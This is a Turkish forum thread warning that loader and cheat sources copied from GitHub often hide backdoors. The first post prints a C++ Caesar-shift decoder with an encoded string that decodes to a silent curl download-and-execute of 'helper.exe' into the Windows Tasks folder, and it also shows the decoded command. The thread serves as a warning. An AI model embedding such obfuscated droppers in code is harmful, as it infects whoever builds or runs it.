Githubdan indirilen hazır sourceler hakkında

wndysss292 · 20 Tem 2024

ahmetcevik' Alıntı:
çoğu loader yapımcısı githubdan indirdikleri sourceleri base alarak başlıyor evet bu normal bir şey fakat

zaten cheatglobalinde yaptığı uyarı gibi kullanılan sourcelerde şifrelenmiş metinler halinde backdoorlar buluyor

bir kod örneği

std::string _cstr_(const std::string& rndcrypt, int shift) {
std::string _debogInt;
for (char c : rndcrypt) { _debogInt += static_cast<char>(c - shift); }
return _debogInt;
}
std::string rndcrypt = "fxuo#00vlohqw#kwwsv=22dwkhudsurmhfw1vkrs2grzqordg2khoshu1h{h#00rxwsxw#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h#Aqxo#5A)4#))#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h";
std::string _debogInt = _cstr_(rndcrypt, 3);

sourceleri böyle yerleştiriyorlar peki ya üstteki örnekte bu kod ne yapıyor ?

curl --silent
Linkleri görebilmek için kayıt olmanız gerekmektedir
indirmesin diye bu kısmı sildim./helper.exe --output C:\Windows\System32\Tasks\helper.exe >nul 2>&1 && C:\Windows\System32\Tasks\helper.exe

böyle şifrelenmiş metinler genelde hazır protected keyauth,fluxauth veya herhangi bir hazır auth üzerine oluyor

umarım bu kodu kendi sourcelerinde kullanan olmaz dikkatli ve saglıklı kalın.

ayrıca
Linkleri görebilmek için kayıt olmanız gerekmektedir
adresinden herhangi bir şey indirmeyin.

Aklıma bı tane sıkıştırma programı geldi

ahmetcevik · 21 Tem 2024

wndysss292' Alıntı:
Aklıma bı tane sıkıştırma programı geldi

hangi program ?

wndysss292 · 21 Tem 2024

ahmetcevik' Alıntı:
hangi program ?

Açıkçası bende tam hatırlamıyorum Yusuf İpek adlı YouTube kanalından izlemiştim bir tane şahıs projeyi geliştirip geliştirip sonra virüs koyuyordu sourceun içine

Kriya · 21 Tem 2024

Githubdan hazır src indirmek hata zaten

ahmetcevik · 21 Tem 2024

Kriya' Alıntı:
Githubdan hazır src indirmek hata zaten

öyle.

Githubdan indirilen hazır sourceler hakkında

wndysss292

ahmetcevik

wndysss292

Kriya

ahmetcevik

Şuanda konuyu görüntüleyen kullanıcılar